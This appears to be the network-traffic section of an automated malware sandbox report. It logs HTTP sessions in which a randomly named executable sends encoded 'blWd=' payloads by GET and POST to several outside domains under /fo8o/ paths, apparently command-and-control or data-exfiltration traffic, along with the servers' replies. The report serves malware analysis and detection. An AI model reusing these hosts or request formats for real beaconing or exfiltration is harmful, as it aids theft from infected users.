            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            12 | 192.168.2.6 | 49738 | 46.30.211.38 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:43.255455971 CEST | 531 | OUT | GET /fo8o/?blWd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.antonio-vivaldi.mobi
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:51:43.897175074 CEST | 738 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Fri, 02 Aug 2024 11:51:43 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            13 | 192.168.2.6 | 49739 | 85.159.66.93 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:49.056546926 CEST | 783 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.magmadokum.com
            Origin: http://www.magmadokum.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.magmadokum.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 33 44 49 62 62 52 59 61 52 6d 70 56 78 77 2b 57 74 51 74 38 70 44 4d 45 33 66 48 4b 44 57 78 30 45 4d 51 34 48 77 47 67 79 62 75
            Data Ascii: blWd=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R03DIbbRYaRmpVxw+WtQt8pDME3fHKDWx0EMQ4HwGgybu
            Aug 2, 2024 13:51:49.833924055 CEST | 225 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 02 Aug 2024 11:51:49 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-08-02T11:51:54.7200281Z


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            14 | 192.168.2.6 | 49740 | 85.159.66.93 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:51.599205017 CEST | 807 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.magmadokum.com
            Origin: http://www.magmadokum.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.magmadokum.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 4f 45 31 48 31 4b 6a 57 62 32 45 30 51 71 51 38 68 76 47 2b 4e 69 51 44 5a 76 62 30 45 59 65 44 4f 54 51 68 2f 44 43 72 39 72 51 3d 3d
            Data Ascii: blWd=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5jOE1H1KjWb2E0QqQ8hvG+NiQDZvb0EYeDOTQh/DCr9rQ==
            Aug 2, 2024 13:51:52.351591110 CEST | 225 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 02 Aug 2024 11:51:52 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 18
            X-Rate-Limit-Reset: 2024-08-02T11:51:54.7200281Z


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            15 | 192.168.2.6 | 49741 | 85.159.66.93 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:54.129615068 CEST | 1820 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.magmadokum.com
            Origin: http://www.magmadokum.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.magmadokum.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 75 45 6d 38 62 43 70 5a 30 37 78 4b 47 4b 50 33 48 63 32 76 79 34 44 69 45 2b 48 36 48 72 46 69 4b 68 63 65 63 72 2b 61 55 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 30 58 4f 43 65 38 58 52 63 44 54 56 67 68 69 78 65 41 37 76 38 67 59 46 69 2f 38 6b 65 73 73 4b 79 65 65 31 45 4f 76 4e 38 51 4a 4e 66 55 44 47 4d 67 2b 65 39 79 31 73 68 51 39 75 73 4b 54 73 73 4a 67 76 2f 6d 64 62 70 2f 6f 43 74 33 6c 49 64 32 [TRUNCATED]
            Data Ascii: blWd=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 [TRUNCATED]
            Aug 2, 2024 13:51:54.910922050 CEST | 225 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 02 Aug 2024 11:51:54 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-08-02T11:51:59.7899409Z


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            16 | 192.168.2.6 | 49744 | 85.159.66.93 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:56.669017076 CEST | 525 | OUT | GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.magmadokum.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:51:57.419544935 CEST | 225 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 02 Aug 2024 11:51:57 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-08-02T11:52:02.2922594Z


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            17 | 192.168.2.6 | 49745 | 91.195.240.94 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:02.465368032 CEST | 786 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.rssnewscast.com
            Origin: http://www.rssnewscast.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.rssnewscast.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 38 39 4a 64 39 49 54 71 44 51 47 32 64 48 32 67 68 72 61 55 52 44 67 6b 56 55 4f 52 48 32 77 49 51 70 6c 30 4f 4b 65 34 35 36 50
            Data Ascii: blWd=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8p89Jd9ITqDQG2dH2ghraURDgkVUORH2wIQpl0OKe456P
            Aug 2, 2024 13:52:03.127219915 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
            date: Fri, 02 Aug 2024 11:52:03 GMT
            content-type: text/html
            content-length: 556
            server: Parking/1.0
            connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            18 | 192.168.2.6 | 49746 | 91.195.240.94 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:05.007319927 CEST | 810 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.rssnewscast.com
            Origin: http://www.rssnewscast.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.rssnewscast.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6a 69 6b 58 4d 38 52 6e 32 61 4b 51 52 6c 6d 5a 47 35 33 4e 66 73 33 6c 50 63 61 46 6e 63 73 47 78 34 4f 35 64 41 2f 36 77 76 55 67 3d 3d
            Data Ascii: blWd=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBjikXM8Rn2aKQRlmZG53Nfs3lPcaFncsGx4O5dA/6wvUg==
            Aug 2, 2024 13:52:05.676372051 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
            date: Fri, 02 Aug 2024 11:52:05 GMT
            content-type: text/html
            content-length: 556
            server: Parking/1.0
            connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            19 | 192.168.2.6 | 49747 | 91.195.240.94 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:07.541042089 CEST | 1823 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.rssnewscast.com
            Origin: http://www.rssnewscast.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.rssnewscast.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Ascii: blWd=[TRUNCATED]
            Aug 2, 2024 13:52:08.218708038 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
            date: Fri, 02 Aug 2024 11:52:08 GMT
            content-type: text/html
            content-length: 556
            server: Parking/1.0
            connection: close
            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            20 | 192.168.2.6 | 49748 | 91.195.240.94 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:10.068593025 CEST | 526 | OUT | GET /fo8o/?blWd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.rssnewscast.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:52:11.078265905 CEST | 1236 | IN | HTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:52:10 GMT
            content-type: text/html; charset=UTF-8
            transfer-encoding: chunked
            vary: Accept-Encoding
            expires: Mon, 26 Jul 1997 05:00:00 GMT
            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
            pragma: no-cache
            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_sFpsoWOWjy1Gxf1qQL8nRHWE3XqoCsFsS/egTRN/i368LJ5yZAXBfyj82jILuQ+D8Y+4P6st/jpl25yMeYzRKw==
            last-modified: Fri, 02 Aug 2024 11:52:10 GMT
            x-cache-miss-from: parking-5b4c494795-xttms
            server: Parking/1.0
            connection: close
